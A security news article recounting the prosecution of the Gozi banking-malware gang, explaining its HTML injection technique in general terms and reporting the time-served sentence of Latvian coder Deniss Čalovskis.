We’ve been following a law enforcement saga surrounding malware called Gozi for two years now.
Gozi was a widespread and successful family of zombie malware, dating right back to 2007, that aimed to steal online banking credentials using a sneaky trick known as HTML injection.
Instead of trying to hack the bank’s online banking server infrastructure, or trying to intercept your HTTPS traffic in transit, which typically causes certificate warnings in your browser, the Gozi crooks used malware to hack your browser’s behaviour, right on your own computer.
Just before your browser displayed online banking forms (in other words, after the bank’s web pages had been received in good order and decrypted without warnings), the malware would inject additional data items into the page, requesting information you wouldn’t normally need to disclose, which was then sent off to the crooks rather than the bank.
Back in 2013, the US Department of Justice (DoJ) wrote up its indictment of three men in New York.
Mihai Ionut Paunescu, out of Romania, ran what are known as “bulletproof hosts” for the enterprise. Think of him as the CIO.
Legimitate ISPs will offer you mirroring and automatic failover for your servers in order to ensure maximum uptime.
But the so-called bulletproofers go one step further, moving your services around online not just to cover for hardware failures and outages, but also to deal with takedowns, blocklisting and other crime-fighting measures.
Deniss Čalovskis of Latvia was the HTML injection expert, coding up the HTML modifications used to trick the victims and steal their account information. Let’s call him the Senior Web Consultant.
And Nikita Kuzmin from Russia was the COO. He hired coders to work on the Gozi malware and operated a Crimeware-as-a-Service (CaaS) business based around it.
You could lease time on Kuzmin’s botnet infrastructure, hosted by Paunescu, using data-stealing content authored by Čalovskis, and manage your entire crooked enterprise through a web portal on Kuzmin’s so-called 76 Service infrastructure.
As we wrote at the time, the DoJ listed, as is its habit, the maximum possible custodial sentences that the trio could pick up, assuming they were convicted and the court threw the book at them: absurd, and even impossible, periods from 60 to 95 years.
Things then got interesting for Čalovskis, who was in Latvia, because courts in his country didn’t like the sound of a theoretical 67-year prison sentence, as mentioned in the indictment, so his extradition to the USA was halted.
As we suggested at the time, it seemed that the US had “risked upsetting the delicate balance required to ensure worldwide prosecutions [typical in cybercrime] can be effectively completed.”
But the Latvian and the Americans eventually found common ground, and in February 2015, Čalovskis was sent to the US.
We reported at the time of his court case:
The reason why Latvian authorities eventually handed him over appears to surround a plea agreement in which Calovskis agreed not to submit an appeal should he be sentenced to two years or less of imprisonment – a hint as to what may happen on 14 December 2015 at his sentencing hearing.
In Čalovskis’s favour, he quickly pleaded guilty, and avoided making excuses, telling the court, “I knew what I was doing was against the law.”
That was in September 2015; he has now been sentenced.
It seems that Čalovskis’s prison sentence will be “time zerved,” meaning that his incarceration while awaiting extradition, trial and sentencing is considered sufficient punishment already.
That adds up to 21 months, which is indeed below the two-year no-appeal period mentioned above.
In other words, he should be home soon, years after this all started.
To paraphrase Henry Longfellow: The justice wheels grind slowly/Yet they grind exceeding small.